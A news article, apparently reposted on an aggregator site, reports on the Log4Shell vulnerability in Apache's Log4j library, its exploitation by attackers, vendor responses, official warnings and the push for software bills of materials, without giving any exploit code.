HomeTechnologyThe Log4J Vulnerability Will Haunt the Internet for Years

The Log4J Vulnerability Will Haunt the Internet for Years


master mentalism tricks

A vulnerability in the open source Apache logging library Log4j sent system administrators and security professionals scrambling over the weekend. Known as Log4Shell, the flaw is exposing some of the world’s most popular applications and services to attack, and the outlook hasn’t improved since the vulnerability came to light on Thursday. If anything, it’s now excruciatingly clear that Log4Shell will continue to wreak havoc across the internet for years to come.

Hackers have been exploiting the bug since the beginning of the month, according to researchers from Cisco and Cloudflare. But attacks ramped up dramatically following Apache’s disclosure on Thursday. So far, attackers have exploited the flaw to install cryptominers on vulnerable systems, steal system credentials, burrow deeper within compromised networks, and steal data, according to a recent report from Microsoft

The range of impacts is so broad because of the nature of the vulnerability itself. Developers use logging frameworks to keep track of what happens in a given application. To exploit Log4Shell, an attacker only needs to get the system to log a strategically crafted string of code. From there they can load arbitrary code on the targeted server and install malware or launch other attacks. Notably, hackers can introduce the snippet in seemingly benign ways, like by sending the string in an email or setting it as an account username.

Major tech players, including Amazon Web Services, Microsoft, Cisco, Google Cloud, and IBM have all found that at least some of their services were vulnerable and have been rushing to issue fixes and advise customers about how best to proceed. The exact extent of the exposure is still coming into view, though. Less fastidious organizations or smaller developers who may lack resources and awareness will be slower to confront the Log4Shell threat. 

“What is almost certain is that for years people will be discovering the long tail of new vulnerable software as they think of new places to put exploit strings,” says independent security researcher Chris Frohoff. “This will probably be showing up in assessments and penetration tests of custom enterprise apps for a long time.”

The vulnerability is already being used by a “growing set of threat actors,” US Cybersecurity and Infrastructure Security Agency director Jen Easterly said in a statement on Saturday. She added that the flaw is “one of the most serious I’ve seen in my entire career, if not the most serious” in a call with critical infrastructure operators on Monday, as first reported by CyberScoop. In that same call, a CISA official estimated that hundreds of millions of devices are likely affected.

The hard part will be tracking all of those down. Many organizations don’t have a clear accounting of every program they use and the software components within each of those systems. The UK’s National Cyber Security Centre emphasized on Monday that enterprises need to “discover unknown instances of Log4j” in addition to patching the usual suspects. By its nature, open source software can be incorporated wherever developers want, meaning that when a major vulnerability crops up, exposed code can lurk around every corner. Even before Log4Shell, software supply chain security advocates had increasingly pushed for “software bills of materials,” or SBOMs, to make it easier to take stock and keep up with security protections.

Read The Full Article Here


trick photography
Advertisingfutmillion

Popular posts

1976 review – Feminine revolutionary cinema
The Beasts review – Symmetrical, yet uneven
The Last of Us Season 1 4K, Blu-ray, and DVD
New Spider-Man 2 Figure Has Miles Morales Teaming Up With
Jonathan Majors Arrested For Alleged Assault, Lovecraft Country Actor Denies
‘Love Is Blind’ Season 4: Which Couples Are Still Together?
What Did You Think of ‘Shrinking’s Finale Twist?
Days of Our Lives Spoilers for the Week of 3-27-23:
Swarm’s Creator and Star on Embracing the “Strange” for a
Gwen Stefani, Alanis Morissette & Shania Twain to Perform at
The Brian Shapiro Band Releases Third Studio Album
Melissa Grey, David Morneau, and Robert Kirkbride Releases New Album
Red Hair Is All the Rage — Here’s How To
I Just Tried Topshop Curve’s New Collection—Here’s My Honest Review
Not All Shoes and Trousers Go Together, But These Combinations
These $50 Old Navy Split-Hem Jeans Are Almost as Comfortable
BookBeat Review: Better than Scribd but Not Widely Accessible
Six Books That Dive Deep Into the Glitz and Glamour
One of the 19 Kids and Counting, Jinger Duggar Vuolo
Danger Lurks in the Shadows of New YA Fantasy Adventure
Wild Isles review: David Attenborough turns focus to UK and
Mysteriously Young ‘Peekaboo’ Galaxy Could Reveal Secrets of Early Universe
Most powerful solar storm in 6 years caused auroras all
Seawater split to produce ‘green’ hydrogen
AI Will Make Human Art More Valuable
Inside a Misfiring Government Data Machine
Senator Warner Wants US Spies to Justify a TikTok Ban
It’s Official: No More Crispr Babies—for Now